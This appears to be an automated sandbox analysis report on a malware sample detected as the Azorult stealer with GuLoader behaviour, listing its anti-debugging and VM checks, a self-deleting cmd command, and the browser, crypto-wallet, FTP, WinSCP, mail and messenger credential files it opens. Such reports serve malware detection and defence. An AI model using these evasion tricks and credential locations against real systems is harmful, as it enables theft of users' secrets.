Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02308D58 rdtsc 0_2_02308D58
Is looking for software installed on the system
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe System information queried: ModuleInformation Jump to behavior
Source: X4lLneI8ZK.exe, 00000000.00000002.615043680.0000000002320000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: X4lLneI8ZK.exe, 00000000.00000002.615043680.0000000002320000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02308D58 rdtsc 0_2_02308D58
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_00401B77 mov ebx, dword ptr fs:[00000030h] 0_2_00401B77
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_00402D9F mov ebx, dword ptr fs:[00000030h] 0_2_00402D9F
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023082BA mov eax, dword ptr fs:[00000030h] 0_2_023082BA
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023096CC mov eax, dword ptr fs:[00000030h] 0_2_023096CC
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230892B mov eax, dword ptr fs:[00000030h] 0_2_0230892B
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02303519 mov eax, dword ptr fs:[00000030h] 0_2_02303519
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02304147 mov eax, dword ptr fs:[00000030h] 0_2_02304147
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023061E9 mov eax, dword ptr fs:[00000030h] 0_2_023061E9
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023074E9 LdrInitializeThunk, 0_2_023074E9

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process created: C:\Users\user\Desktop\X4lLneI8ZK.exe 'C:\Users\user\Desktop\X4lLneI8ZK.exe' Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'X4lLneI8ZK.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3 Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Azorult
Source: Yara match File source: 17.2.X4lLneI8ZK.exe.1fb9a0b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.X4lLneI8ZK.exe.1fc277ee.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.X4lLneI8ZK.exe.1fbbc09d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.935788645.000000001FF10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.935761857.000000001FEF8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: X4lLneI8ZK.exe PID: 1012, type: MEMORYSTR
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\ Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\ Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xml Jump to behavior
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Tries to steal Instant Messenger accounts or passwords
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs